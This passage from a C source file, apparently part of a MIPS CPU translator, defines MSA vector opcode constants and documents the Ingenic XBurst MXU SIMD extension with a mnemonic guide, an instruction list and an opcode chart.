(0x00 << 21) | OPC_MSA_VEC, OPC_OR_V = (0x01 << 21) | OPC_MSA_VEC, OPC_NOR_V = (0x02 << 21) | OPC_MSA_VEC, OPC_XOR_V = (0x03 << 21) | OPC_MSA_VEC, OPC_BMNZ_V = (0x04 << 21) | OPC_MSA_VEC, OPC_BMZ_V = (0x05 << 21) | OPC_MSA_VEC, OPC_BSEL_V = (0x06 << 21) | OPC_MSA_VEC, OPC_MSA_2R = (0x18 << 21) | OPC_MSA_VEC, OPC_MSA_2RF = (0x19 << 21) | OPC_MSA_VEC, /* 2R instruction df(bits 17..16) = _b, _h, _w, _d */ OPC_FILL_df = (0x00 << 18) | OPC_MSA_2R, OPC_PCNT_df = (0x01 << 18) | OPC_MSA_2R, OPC_NLOC_df = (0x02 << 18) | OPC_MSA_2R, OPC_NLZC_df = (0x03 << 18) | OPC_MSA_2R, /* 2RF instruction df(bit 16) = _w, _d */ OPC_FCLASS_df = (0x00 << 17) | OPC_MSA_2RF, OPC_FTRUNC_S_df = (0x01 << 17) | OPC_MSA_2RF, OPC_FTRUNC_U_df = (0x02 << 17) | OPC_MSA_2RF, OPC_FSQRT_df = (0x03 << 17) | OPC_MSA_2RF, OPC_FRSQRT_df = (0x04 << 17) | OPC_MSA_2RF, OPC_FRCP_df = (0x05 << 17) | OPC_MSA_2RF, OPC_FRINT_df = (0x06 << 17) | OPC_MSA_2RF, OPC_FLOG2_df = (0x07 << 17) | OPC_MSA_2RF, OPC_FEXUPL_df = (0x08 << 17) | OPC_MSA_2RF, OPC_FEXUPR_df = (0x09 << 17) | OPC_MSA_2RF, OPC_FFQL_df = (0x0A << 17) | OPC_MSA_2RF, OPC_FFQR_df = (0x0B << 17) | OPC_MSA_2RF, OPC_FTINT_S_df = (0x0C << 17) | OPC_MSA_2RF, OPC_FTINT_U_df = (0x0D << 17) | OPC_MSA_2RF, OPC_FFINT_S_df = (0x0E << 17) | OPC_MSA_2RF, OPC_FFINT_U_df = (0x0F << 17) 
| OPC_MSA_2RF, /* 3R instruction df(bits 22..21) = _b, _h, _w, d */ OPC_SLL_df = (0x0 << 23) | OPC_MSA_3R_0D, OPC_ADDV_df = (0x0 << 23) | OPC_MSA_3R_0E, OPC_CEQ_df = (0x0 << 23) | OPC_MSA_3R_0F, OPC_ADD_A_df = (0x0 << 23) | OPC_MSA_3R_10, OPC_SUBS_S_df = (0x0 << 23) | OPC_MSA_3R_11, OPC_MULV_df = (0x0 << 23) | OPC_MSA_3R_12, OPC_DOTP_S_df = (0x0 << 23) | OPC_MSA_3R_13, OPC_SLD_df = (0x0 << 23) | OPC_MSA_3R_14, OPC_VSHF_df = (0x0 << 23) | OPC_MSA_3R_15, OPC_SRA_df = (0x1 << 23) | OPC_MSA_3R_0D, OPC_SUBV_df = (0x1 << 23) | OPC_MSA_3R_0E, OPC_ADDS_A_df = (0x1 << 23) | OPC_MSA_3R_10, OPC_SUBS_U_df = (0x1 << 23) | OPC_MSA_3R_11, OPC_MADDV_df = (0x1 << 23) | OPC_MSA_3R_12, OPC_DOTP_U_df = (0x1 << 23) | OPC_MSA_3R_13, OPC_SPLAT_df = (0x1 << 23) | OPC_MSA_3R_14, OPC_SRAR_df = (0x1 << 23) | OPC_MSA_3R_15, OPC_SRL_df = (0x2 << 23) | OPC_MSA_3R_0D, OPC_MAX_S_df = (0x2 << 23) | OPC_MSA_3R_0E, OPC_CLT_S_df = (0x2 << 23) | OPC_MSA_3R_0F, OPC_ADDS_S_df = (0x2 << 23) | OPC_MSA_3R_10, OPC_SUBSUS_U_df = (0x2 << 23) | OPC_MSA_3R_11, OPC_MSUBV_df = (0x2 << 23) | OPC_MSA_3R_12, OPC_DPADD_S_df = (0x2 << 23) | OPC_MSA_3R_13, OPC_PCKEV_df = (0x2 << 23) | OPC_MSA_3R_14, OPC_SRLR_df = (0x2 << 23) | OPC_MSA_3R_15, OPC_BCLR_df = (0x3 << 23) | OPC_MSA_3R_0D, OPC_MAX_U_df = (0x3 << 23) | OPC_MSA_3R_0E, OPC_CLT_U_df = (0x3 << 23) | OPC_MSA_3R_0F, OPC_ADDS_U_df = (0x3 << 23) | OPC_MSA_3R_10, OPC_SUBSUU_S_df = (0x3 << 23) | OPC_MSA_3R_11, OPC_DPADD_U_df = (0x3 << 23) | OPC_MSA_3R_13, OPC_PCKOD_df = (0x3 << 23) | OPC_MSA_3R_14, OPC_BSET_df = (0x4 << 23) | OPC_MSA_3R_0D, OPC_MIN_S_df = (0x4 << 23) | OPC_MSA_3R_0E, OPC_CLE_S_df = (0x4 << 23) | OPC_MSA_3R_0F, OPC_AVE_S_df = (0x4 << 23) | OPC_MSA_3R_10, OPC_ASUB_S_df = (0x4 << 23) | OPC_MSA_3R_11, OPC_DIV_S_df = (0x4 << 23) | OPC_MSA_3R_12, OPC_DPSUB_S_df = (0x4 << 23) | OPC_MSA_3R_13, OPC_ILVL_df = (0x4 << 23) | OPC_MSA_3R_14, OPC_HADD_S_df = (0x4 << 23) | OPC_MSA_3R_15, OPC_BNEG_df = (0x5 << 23) | OPC_MSA_3R_0D, OPC_MIN_U_df = (0x5 << 23) | OPC_MSA_3R_0E, OPC_CLE_U_df = (0x5 << 23) | OPC_MSA_3R_0F, OPC_AVE_U_df = (0x5 << 23) | OPC_MSA_3R_10, OPC_ASUB_U_df = (0x5 << 23) | OPC_MSA_3R_11, OPC_DIV_U_df = (0x5 << 23) | OPC_MSA_3R_12, OPC_DPSUB_U_df = (0x5 << 23) | OPC_MSA_3R_13, OPC_ILVR_df = (0x5 << 23) | OPC_MSA_3R_14, OPC_HADD_U_df = (0x5 << 23) | OPC_MSA_3R_15, OPC_BINSL_df = (0x6 << 23) | OPC_MSA_3R_0D, OPC_MAX_A_df = (0x6 << 23) | OPC_MSA_3R_0E, OPC_AVER_S_df = (0x6 << 23) | OPC_MSA_3R_10, OPC_MOD_S_df = (0x6 << 23) | OPC_MSA_3R_12, OPC_ILVEV_df = (0x6 << 23) | OPC_MSA_3R_14, OPC_HSUB_S_df = (0x6 << 23) | OPC_MSA_3R_15, OPC_BINSR_df = (0x7 << 23) | OPC_MSA_3R_0D, OPC_MIN_A_df = (0x7 << 23) | OPC_MSA_3R_0E, OPC_AVER_U_df = (0x7 << 23) | OPC_MSA_3R_10, OPC_MOD_U_df = (0x7 << 23) | OPC_MSA_3R_12, OPC_ILVOD_df = (0x7 << 23) | OPC_MSA_3R_14, OPC_HSUB_U_df = (0x7 << 23) | OPC_MSA_3R_15, /* ELM instructions df(bits 21..16) = _b, _h, _w, _d */ OPC_SLDI_df = (0x0 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_CTCMSA = (0x0 << 22) | (0x3E << 16) | OPC_MSA_ELM, OPC_SPLATI_df = (0x1 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_CFCMSA = (0x1 << 22) | (0x3E << 16) | OPC_MSA_ELM, OPC_COPY_S_df = (0x2 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_MOVE_V = (0x2 << 22) | (0x3E << 16) | OPC_MSA_ELM, OPC_COPY_U_df = (0x3 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_INSERT_df = (0x4 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_INSVE_df = (0x5 << 22) | (0x00 << 16) | OPC_MSA_ELM, /* 3RF instruction _df(bit 21) = _w, _d */ OPC_FCAF_df = (0x0 << 22) | OPC_MSA_3RF_1A, OPC_FADD_df = (0x0 << 22) | OPC_MSA_3RF_1B, 
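/*
 * The _df suffix marks encodings that still carry a data-format field:
 * FADD.W and FADD.D, for example, both match OPC_FADD_df above, and the
 * translator is expected to extract df from the instruction word itself
 * (bit 21 for 3RF, bits 22..21 for 3R, etc., per the per-group comments).
 */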
OPC_FCUN_df = (0x1 << 22) | OPC_MSA_3RF_1A, OPC_FSUB_df = (0x1 << 22) | OPC_MSA_3RF_1B, OPC_FCOR_df = (0x1 << 22) | OPC_MSA_3RF_1C, OPC_FCEQ_df = (0x2 << 22) | OPC_MSA_3RF_1A, OPC_FMUL_df = (0x2 << 22) | OPC_MSA_3RF_1B, OPC_FCUNE_df = (0x2 << 22) | OPC_MSA_3RF_1C, OPC_FCUEQ_df = (0x3 << 22) | OPC_MSA_3RF_1A, OPC_FDIV_df = (0x3 << 22) | OPC_MSA_3RF_1B, OPC_FCNE_df = (0x3 << 22) | OPC_MSA_3RF_1C, OPC_FCLT_df = (0x4 << 22) | OPC_MSA_3RF_1A, OPC_FMADD_df = (0x4 << 22) | OPC_MSA_3RF_1B, OPC_MUL_Q_df = (0x4 << 22) | OPC_MSA_3RF_1C, OPC_FCULT_df = (0x5 << 22) | OPC_MSA_3RF_1A, OPC_FMSUB_df = (0x5 << 22) | OPC_MSA_3RF_1B, OPC_MADD_Q_df = (0x5 << 22) | OPC_MSA_3RF_1C, OPC_FCLE_df = (0x6 << 22) | OPC_MSA_3RF_1A, OPC_MSUB_Q_df = (0x6 << 22) | OPC_MSA_3RF_1C, OPC_FCULE_df = (0x7 << 22) | OPC_MSA_3RF_1A, OPC_FEXP2_df = (0x7 << 22) | OPC_MSA_3RF_1B, OPC_FSAF_df = (0x8 << 22) | OPC_MSA_3RF_1A, OPC_FEXDO_df = (0x8 << 22) | OPC_MSA_3RF_1B, OPC_FSUN_df = (0x9 << 22) | OPC_MSA_3RF_1A, OPC_FSOR_df = (0x9 << 22) | OPC_MSA_3RF_1C, OPC_FSEQ_df = (0xA << 22) | OPC_MSA_3RF_1A, OPC_FTQ_df = (0xA << 22) | OPC_MSA_3RF_1B, OPC_FSUNE_df = (0xA << 22) | OPC_MSA_3RF_1C, OPC_FSUEQ_df = (0xB << 22) | OPC_MSA_3RF_1A, OPC_FSNE_df = (0xB << 22) | OPC_MSA_3RF_1C, OPC_FSLT_df = (0xC << 22) | OPC_MSA_3RF_1A, OPC_FMIN_df = (0xC << 22) | OPC_MSA_3RF_1B, OPC_MULR_Q_df = (0xC << 22) | OPC_MSA_3RF_1C, OPC_FSULT_df = (0xD << 22) | OPC_MSA_3RF_1A, OPC_FMIN_A_df = (0xD << 22) | OPC_MSA_3RF_1B, OPC_MADDR_Q_df = (0xD << 22) | OPC_MSA_3RF_1C, OPC_FSLE_df = (0xE << 22) | OPC_MSA_3RF_1A, OPC_FMAX_df = (0xE << 22) | OPC_MSA_3RF_1B, OPC_MSUBR_Q_df = (0xE << 22) | OPC_MSA_3RF_1C, OPC_FSULE_df = (0xF << 22) | OPC_MSA_3RF_1A, OPC_FMAX_A_df = (0xF << 22) | OPC_MSA_3RF_1B, /* BIT instruction df(bits 22..16) = _B _H _W _D */ OPC_SLLI_df = (0x0 << 23) | OPC_MSA_BIT_09, OPC_SAT_S_df = (0x0 << 23) | OPC_MSA_BIT_0A, OPC_SRAI_df = (0x1 << 23) | OPC_MSA_BIT_09, OPC_SAT_U_df = (0x1 << 23) | OPC_MSA_BIT_0A, OPC_SRLI_df = (0x2 << 23) | OPC_MSA_BIT_09, OPC_SRARI_df = (0x2 << 23) | OPC_MSA_BIT_0A, OPC_BCLRI_df = (0x3 << 23) | OPC_MSA_BIT_09, OPC_SRLRI_df = (0x3 << 23) | OPC_MSA_BIT_0A, OPC_BSETI_df = (0x4 << 23) | OPC_MSA_BIT_09, OPC_BNEGI_df = (0x5 << 23) | OPC_MSA_BIT_09, OPC_BINSLI_df = (0x6 << 23) | OPC_MSA_BIT_09, OPC_BINSRI_df = (0x7 << 23) | OPC_MSA_BIT_09, }; /* * * AN OVERVIEW OF MXU EXTENSION INSTRUCTION SET * ============================================ * * * MXU (full name: MIPS eXtension/enhanced Unit) is a SIMD extension of the * MIPS32 instruction set. It is designed to fit the needs of signal, graphical * and video processing applications. The MXU instruction set is used in the * XBurst family of microprocessors by Ingenic. * * The MXU unit contains 17 registers called X0-X16. X0 is always zero, and * X16 is the control register.
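 * (Each XRF register is 32 bits wide; the S32/D16/Q8 prefixes explained in
 * the notation section below encode how many lanes of which width an
 * operation processes.)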
* * * The notation used in MXU assembler mnemonics * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * Register operands: * * XRa, XRb, XRc, XRd - MXU registers * Rb, Rc, Rd, Rs, Rt - general purpose MIPS registers * * Non-register operands: * * aptn1 - 1-bit accumulate add/subtract pattern * aptn2 - 2-bit accumulate add/subtract pattern * eptn2 - 2-bit execute add/subtract pattern * optn2 - 2-bit operand pattern * optn3 - 3-bit operand pattern * sft4 - 4-bit shift amount * strd2 - 2-bit stride amount * * Prefixes: * * Level of parallelism: Operand size: * S - single operation at a time 32 - word * D - two operations in parallel 16 - half word * Q - four operations in parallel 8 - byte * * Operations: * * ADD - Add or subtract * ADDC - Add with carry-in * ACC - Accumulate * ASUM - Sum together then accumulate (add or subtract) * ASUMC - Sum together then accumulate (add or subtract) with carry-in * AVG - Average between 2 operands * ABD - Absolute difference * ALN - Align data * AND - Logical bitwise 'and' operation * CPS - Copy sign * EXTR - Extract bits * I2M - Move from GPR register to MXU register * LDD - Load data from memory to XRF * LDI - Load data from memory to XRF (and increase the address base) * LUI - Load unsigned immediate * MUL - Multiply * MULU - Unsigned multiply * MADD - 64-bit operand add 32x32 product * MSUB - 64-bit operand subtract 32x32 product * MAC - Multiply and accumulate (add or subtract) * MAD - Multiply and add or subtract * MAX - Maximum between 2 operands * MIN - Minimum between 2 operands * M2I - Move from MXU register to GPR register * MOVZ - Move if zero * MOVN - Move if non-zero * NOR - Logical bitwise 'nor' operation * OR - Logical bitwise 'or' operation * STD - Store data from XRF to memory * SDI - Store data from XRF to memory (and increase the address base) * SLT - Set of less than comparison * SAD - Sum of absolute differences * SLL - Logical shift left * SLR - Logical shift right * SAR - Arithmetic shift right * SAT - Saturation * SFL - Shuffle * SCOP - Calculate x's scope (-1, means x<0; 0, means x==0; 1, means x>0) * XOR - Logical bitwise 'exclusive or' operation * * Suffixes: * * E - Expand results * F - Fixed point multiplication * L - Low part result * R - Doing rounding * V - Variable instead of immediate * W - Combine above L and V * * * The list of MXU instructions grouped by functionality * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * Load/Store instructions Multiplication instructions * ----------------------- --------------------------- * * S32LDD XRa, Rb, s12 S32MADD XRa, XRd, Rs, Rt * S32STD XRa, Rb, s12 S32MADDU XRa, XRd, Rs, Rt * S32LDDV XRa, Rb, rc, strd2 S32MSUB XRa, XRd, Rs, Rt * S32STDV XRa, Rb, rc, strd2 S32MSUBU XRa, XRd, Rs, Rt * S32LDI XRa, Rb, s12 S32MUL XRa, XRd, Rs, Rt * S32SDI XRa, Rb, s12 S32MULU XRa, XRd, Rs, Rt * S32LDIV XRa, Rb, rc, strd2 D16MUL XRa, XRb, XRc, XRd, optn2 * S32SDIV XRa, Rb, rc, strd2 D16MULE XRa, XRb, XRc, optn2 * S32LDDR XRa, Rb, s12 D16MULF XRa, XRb, XRc, optn2 * S32STDR XRa, Rb, s12 D16MAC XRa, XRb, XRc, XRd, aptn2, optn2 * S32LDDVR XRa, Rb, rc, strd2 D16MACE XRa, XRb, XRc, XRd, aptn2, optn2 * S32STDVR XRa, Rb, rc, strd2 D16MACF XRa, XRb, XRc, XRd, aptn2, optn2 * S32LDIR XRa, Rb, s12 D16MADL XRa, XRb, XRc, XRd, aptn2, optn2 * S32SDIR XRa, Rb, s12 S16MAD XRa, XRb, XRc, XRd, aptn1, optn2 * S32LDIVR XRa, Rb, rc, strd2 Q8MUL XRa, XRb, XRc, XRd * S32SDIVR XRa, Rb, rc, strd2 Q8MULSU XRa, XRb, XRc, XRd * S16LDD XRa, Rb, s10, eptn2 Q8MAC XRa, XRb, XRc, XRd, aptn2 * S16STD XRa, Rb, s10, eptn2 
Q8MACSU XRa, XRb, XRc, XRd, aptn2 * S16LDI XRa, Rb, s10, eptn2 Q8MADL XRa, XRb, XRc, XRd, aptn2 * S16SDI XRa, Rb, s10, eptn2 * S8LDD XRa, Rb, s8, eptn3 * S8STD XRa, Rb, s8, eptn3 Addition and subtraction instructions * S8LDI XRa, Rb, s8, eptn3 ------------------------------------- * S8SDI XRa, Rb, s8, eptn3 * LXW Rd, Rs, Rt, strd2 D32ADD XRa, XRb, XRc, XRd, eptn2 * LXH Rd, Rs, Rt, strd2 D32ADDC XRa, XRb, XRc, XRd * LXHU Rd, Rs, Rt, strd2 D32ACC XRa, XRb, XRc, XRd, eptn2 * LXB Rd, Rs, Rt, strd2 D32ACCM XRa, XRb, XRc, XRd, eptn2 * LXBU Rd, Rs, Rt, strd2 D32ASUM XRa, XRb, XRc, XRd, eptn2 * S32CPS XRa, XRb, XRc * Q16ADD XRa, XRb, XRc, XRd, eptn2, optn2 * Comparison instructions Q16ACC XRa, XRb, XRc, XRd, eptn2 * ----------------------- Q16ACCM XRa, XRb, XRc, XRd, eptn2 * D16ASUM XRa, XRb, XRc, XRd, eptn2 * S32MAX XRa, XRb, XRc D16CPS XRa, XRb, * S32MIN XRa, XRb, XRc D16AVG XRa, XRb, XRc * S32SLT XRa, XRb, XRc D16AVGR XRa, XRb, XRc * S32MOVZ XRa, XRb, XRc Q8ADD XRa, XRb, XRc, eptn2 * S32MOVN XRa, XRb, XRc Q8ADDE XRa, XRb, XRc, XRd, eptn2 * D16MAX XRa, XRb, XRc Q8ACCE XRa, XRb, XRc, XRd, eptn2 * D16MIN XRa, XRb, XRc Q8ABD XRa, XRb, XRc * D16SLT XRa, XRb, XRc Q8SAD XRa, XRb, XRc, XRd * D16MOVZ XRa, XRb, XRc Q8AVG XRa, XRb, XRc * D16MOVN XRa, XRb, XRc Q8AVGR XRa, XRb, XRc * Q8MAX XRa, XRb, XRc D8SUM XRa, XRb, XRc, XRd * Q8MIN XRa, XRb, XRc D8SUMC XRa, XRb, XRc, XRd * Q8SLT XRa, XRb, XRc * Q8SLTU XRa, XRb, XRc * Q8MOVZ XRa, XRb, XRc Shift instructions * Q8MOVN XRa, XRb, XRc ------------------ * * D32SLL XRa, XRb, XRc, XRd, sft4 * Bitwise instructions D32SLR XRa, XRb, XRc, XRd, sft4 * -------------------- D32SAR XRa, XRb, XRc, XRd, sft4 * D32SARL XRa, XRb, XRc, sft4 * S32NOR XRa, XRb, XRc D32SLLV XRa, XRb, Rb * S32AND XRa, XRb, XRc D32SLRV XRa, XRb, Rb * S32XOR XRa, XRb, XRc D32SARV XRa, XRb, Rb * S32OR XRa, XRb, XRc D32SARW XRa, XRb, XRc, Rb * Q16SLL XRa, XRb, XRc, XRd, sft4 * Q16SLR XRa, XRb, XRc, XRd, sft4 * Miscellaneous instructions Q16SAR XRa, XRb, XRc, XRd, sft4 * ------------------------- Q16SLLV XRa, XRb, Rb * Q16SLRV XRa, XRb, Rb * S32SFL XRa, XRb, XRc, XRd, optn2 Q16SARV XRa, XRb, Rb * S32ALN XRa, XRb, XRc, Rb * S32ALNI XRa, XRb, XRc, s3 * S32LUI XRa, s8, optn3 Move instructions * S32EXTR XRa, XRb, Rb, bits5 ----------------- * S32EXTRV XRa, XRb, Rs, Rt * Q16SCOP XRa, XRb, XRc, XRd S32M2I XRa, Rb * Q16SAT XRa, XRb, XRc S32I2M XRa, Rb * * * The opcode organization of MXU instructions * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * The bits 31..26 of all MXU instructions are equal to 0x1C (also referred * as opcode SPECIAL2 in the base MIPS ISA). 
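 * A decoder consequently matches the SPECIAL2 major opcode first, then
 * dispatches on bits 05..00, and finally, for the OPC_MXU__POOLxx rows, on
 * the extra selector field that the chart below names for each pool.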
The organization and meaning of * other bits up to the instruction level is as follows: * * bits * 05..00 * * |- 000000 - OPC_MXU_S32MADD * |- 000001 - OPC_MXU_S32MADDU * |- 000010 - <not assigned> (non-MXU OPC_MUL) * | * | 20..18 * |- 000011 - OPC_MXU__POOL00 --- 000 - OPC_MXU_S32MAX * | |- 001 - OPC_MXU_S32MIN * | |- 010 - OPC_MXU_D16MAX * | |- 011 - OPC_MXU_D16MIN * | |- 100 - OPC_MXU_Q8MAX * | |- 101 - OPC_MXU_Q8MIN * | |- 110 - OPC_MXU_Q8SLT * | |- 111 - OPC_MXU_Q8SLTU * |- 000100 - OPC_MXU_S32MSUB * |- 000101 - OPC_MXU_S32MSUBU 20..18 * |- 000110 - OPC_MXU__POOL01 --- 000 - OPC_MXU_S32SLT * | |- 001 - OPC_MXU_D16SLT * | |- 010 - OPC_MXU_D16AVG * | |- 011 - OPC_MXU_D16AVGR * | |- 100 - OPC_MXU_Q8AVG * | |- 101 - OPC_MXU_Q8AVGR * | |- 111 - OPC_MXU_Q8ADD * | * | 20..18 * |- 000111 - OPC_MXU__POOL02 --- 000 - OPC_MXU_S32CPS * | |- 010 - OPC_MXU_D16CPS * | |- 100 - OPC_MXU_Q8ABD * | |- 110 - OPC_MXU_Q16SAT * |- 001000 - OPC_MXU_D16MUL * | 25..24 * |- 001001 - OPC_MXU__POOL03 --- 00 - OPC_MXU_D16MULF * | |- 01 - OPC_MXU_D16MULE * |- 001010 - OPC_MXU_D16MAC * |- 001011 - OPC_MXU_D16MACF * |- 001100 - OPC_MXU_D16MADL * |- 001101 - OPC_MXU_S16MAD * |- 001110 - OPC_MXU_Q16ADD * |- 001111 - OPC_MXU_D16MACE 23 * | |- 0 - OPC_MXU_S32LDD * |- 010000 - OPC_MXU__POOL04 --- 1 - OPC_MXU_S32LDDR * | * | 23 * |- 010001 - OPC_MXU__POOL05 --- 0 - OPC_MXU_S32STD * | |- 1 - OPC_MXU_S32STDR * | * | 13..10 * |- 010010 - OPC_MXU__POOL06 --- 0000 - OPC_MXU_S32LDDV * | |- 0001 - OPC_MXU_S32LDDVR * | * | 13..10 * |- 010011 - OPC_MXU__POOL07 --- 0000 - OPC_MXU_S32STDV * | |- 0001 - OPC_MXU_S32STDVR * | * | 23 * |- 010100 - OPC_MXU__POOL08 --- 0 - OPC_MXU_S32LDI * | |- 1 - OPC_MXU_S32LDIR * | * | 23 * |- 010101 - OPC_MXU__POOL09 --- 0 - OPC_MXU_S32SDI * | |- 1 - OPC_MXU_S32SDIR * | * | 13..10 * |- 010110 - OPC_MXU__POOL10 --- 0000 - OPC_MXU_S32LDIV * | |- 0001 - OPC_MXU_S32LDIVR * | * | 13..10 * |- 010111 - OPC_MXU__POOL11 --- 0000 - OPC_MXU_S32SDIV * | |- 0001 - OPC_MXU_S32SDIVR * |- 011000 - OPC_MXU_D32ADD * | 23..22 * MXU |- 011001 - OPC_MXU__POOL12 --- 00 - OPC_MXU_D32ACC * opcodes -| |- 01 - OPC_MXU_D32ACCM * | |- 10 - OPC_MXU_D32ASUM * |- 011010 - <not assigned> * | 23..22 * |- 011011 - OPC_MXU__POOL13 --- 00 - OPC_MXU_Q16ACC * | |- 01 - OPC_MXU_Q16ACCM * | |- 10 - OPC_MXU_Q16ASUM * | * | 23..22 * |- 011100 - OPC_MXU__POOL14 --- 00 - OPC_MXU_Q8ADDE * | |- 01 - OPC_MXU_D8SUM * |- 011101 - OPC_MXU_Q8ACCE |- 10 - OPC_MXU_D8SUMC * |- 011110 - <not assigned> * |- 011111 - <not assigned> * |- 100000 - <not assigned> (overlaps with CLZ) * |- 100001 - <not assigned> (overlaps with CLO) * |- 100010 - OPC_MXU_S8LDD * |- 100011 - OPC_MXU_S8STD 15..14 * |- 100100 - OPC_MXU_S8LDI |- 00 - OPC_MXU_S32MUL * |- 100101 - OPC_MXU_S8SDI |- 00 - OPC_MXU_S32MULU * | |- 00 - OPC_MXU_S32EXTR * |- 100110 - OPC_MXU__POOL15 --- 00 - OPC_MXU_S32EXTRV * | * | 20..18 * |- 100111 - OPC_MXU__POOL16 --- 000 - OPC_MXU_D32SARW * | |- 001 - OPC_MXU_S32ALN * | |- 010 - OPC_MXU_S32ALNI * | |- 011 - OPC_MXU_S32LUI * | |- 100 - OPC_MXU_S32NOR * | |- 101 - OPC_MXU_S32AND * | |- 110 - OPC_MXU_S32OR * | |- 111 - OPC_MXU_S32XOR * | * | 7..5 * |- 101000 - OPC_MXU__POOL17 --- 000 - OPC_MXU_LXB * | |- 001 - OPC_MXU_LXH * |- 101001 - <not assigned> |- 011 - OPC_MXU_LXW * |- 101010 - OPC_MXU_S16LDD |- 100 - OPC_MXU_LXBU * |- 101011 - OPC_MXU_S16STD |- 101 - OPC_MXU_LXHU * |- 101100 - OPC_MXU_S16LDI * |- 101101 - OPC_MXU_S16SDI * |- 101110 - OPC_MXU_S32M2I * |- 101111 - OPC_MXU_S32I2M * |- 110000 - OPC_MXU_D32SLL * |- 110001 - OPC_MXU_D32SLR 20..18 * |- 
110010 - OPC_MXU_D32SARL |- 000 - OPC_MXU_D32SLLV * |- 110011 - OPC_MXU_D32SAR |- 001 - OPC_MXU_D32SLRV * |- 110100 - OPC_MXU_Q16SLL |- 010 - OPC_MXU_D32SARV * |- 110101 - OPC_MXU_Q16SLR |- 011 - OPC_MXU_Q16SLLV * | |- 100 - OPC_MXU_Q16SLRV * |- 110110 - OPC_MXU__POOL18 --- 101 - OPC_MXU_Q16SARV * | * |- 110111 - OPC_MXU_Q16SAR * | 23..22 * |- 111000 - OPC_MXU__POOL19 --- 00 - OPC_MXU_Q8MUL * | |- 01 - OPC_MXU_Q8MULSU * | * | 20..18 * |- 111001 - OPC_MXU__POOL20 --- 000 - OPC_MXU_Q8MOVZ * | |- 001 - OPC_MXU_Q8MOVN * | |- 010 - OPC_MXU_D16MOVZ * | |- 011 - OPC_MXU_D16MOVN * | |- 100 - OPC_MXU_S32MOVZ * | |- 101 - OPC_MXU_S32MOVN * | * | 23..22 * |- 111010 - OPC_MXU__POOL21 --- 00 - OPC_MXU_Q8MAC * | |- 10 - OPC_MXU_Q8MACSU * |- 111011 - OPC_MXU_Q16SCOP * |- 111100 - OPC_MXU_Q8MADL * |- 111101 - OPC_MXU_S32SFL * |- 111110 - OPC_MXU_Q8SAD * |- 111111 - <not assigned> (overlaps with SDBBP) * * * Compiled after: * * "XBurst(c) Instruction Set Architecture MIPS eXtension/enhanced Unit * Programming Manual", Ingenic Semiconductor Co, Ltd., revision June 2, 2017 */ enum { OPC_MXU_S32MADD = 0x00, OPC_MXU_S32MADDU = 0x01, OPC__MXU_MUL = 0x02, OPC_MXU__POOL00 = 0x03, OPC_MXU_S32MSUB = 0x04, OPC_MXU_S32MSUBU = 0x05, OPC_MXU__POOL01 = 0x06, OPC_MXU__POOL02 = 0x07, OPC_MXU_D16MUL = 0x08, OPC_MXU__POOL03 = 0x09, OPC_MXU_D16MAC = 0x0A, OPC_MXU_D16MACF = 0x0B, OPC_MXU_D16MADL = 0x0C, OPC_MXU_S16MAD = 0x0D, OPC_MXU_Q16ADD = 0x0E, OPC_MXU_D16MACE = 0x0F, OPC_MXU__POOL04 = 0x10, OPC_MXU__POOL05 = 0x11, OPC_MXU__POOL06 = 0x12, OPC_MXU__POOL07 = 0x13, OPC_MXU__POOL08 = 0x14, OPC_MXU__POOL09 = 0x15, OPC_MXU__POOL10 = 0x16, OPC_MXU__POOL11 = 0x17, OPC_MXU_D32ADD = 0x18, OPC_MXU__POOL12 = 0x19, /* not assigned 0x1A */ OPC_MXU__POOL13 = 0x1B, OPC_MXU__POOL14 = 0x1C, OPC_MXU_Q8ACCE = 0x1D, /* not assigned 0x1E */ /* not assigned 0x1F */ /* not assigned 0x20 */ /* not assigned 0x21 */ OPC_MXU_S8LDD = 0x22, OPC_MXU_S8STD = 0x23, OPC_MXU_S8LDI = 0x24, OPC_MXU_S8SDI = 0x25, OPC_MXU__POOL15 = 0x26, OPC_MXU__POOL16 = 0x27, OPC_MXU__POOL17 = 0x28, /* not assigned 0x29 */ OPC_MXU_S16LDD = 0x2A, OPC_MXU_S16STD = 0x2B, OPC_MXU_S16LDI = 0x2C, OPC_MXU_S16SDI = 0x2D, OPC_MXU_S32M2I = 0x2E, OPC_MXU_S32I2M = 0x2F, OPC_MXU_D32SLL = 0x30, OPC_MXU_D32SLR = 0x31, OPC_MXU_D32SARL = 0x32, OPC_MXU_D32SAR = 0x33, OPC_MXU_Q16SLL = 0x34, OPC_MXU_Q16SLR = 0x35, OPC_MXU__POOL18 = 0x36, OPC_MXU_Q16SAR = 0x37, OPC_MXU__POOL19 = 0x38, OPC_MXU__POOL20 = 0x39, OPC_MXU__POOL21 = 0x3A, OPC_MXU_Q16SCOP = 0x3B, OPC_MXU_Q8MADL = 0x3C, OPC_MXU_S32SFL = 0x3D, OPC_MXU_Q8SAD = 0x3E, /* not assigned 0x3F */ }; /* * MXU pool 00 */ enum { OPC_MXU_S32MAX = 0x00, OPC_MXU_S32MIN = 0x01, OPC_MXU_D16MAX = 0x02, OPC_MXU_D16MIN = 0x03, OPC_MXU_Q8MAX = 0x04, OPC_MXU_Q8MIN = 0x05, OPC_MXU_Q8SLT = 0x06, OPC_MXU_Q8SLTU = 0x07, }; /* * MXU pool 01 */ enum { OPC_MXU_S32SLT = 0x00, OPC_MXU_D16SLT = 0x01, OPC_MXU_D16AVG = 0x02, OPC_MXU_D16AVGR = 0x03, OPC_MXU_Q8AVG = 0x04, OPC_MXU_Q8AVGR = 0x05, OPC_MXU_Q8ADD = 0x07, }; /* * MXU pool 02 */ enum { OPC_MXU_S32CPS = 0x00, OPC_MXU_D16CPS = 0x02, OPC_MXU_Q8ABD = 0x04, OPC_MXU_Q16SAT = 0x06, }; /* * MXU pool 03 */ enum { OPC_MXU_D16MULF = 0x00, OPC_MXU_D16MULE = 0x01, }; /* * MXU pool 04 */ enum { OPC_MXU_S32LDD = 0x00, OPC_MXU_S32LDDR = 0x01, }; /* * MXU pool 05 */ enum { OPC_MXU_S32STD = 0x00, OPC_MXU_S32STDR = 0x01, }; /* * MXU pool 06 */ enum { 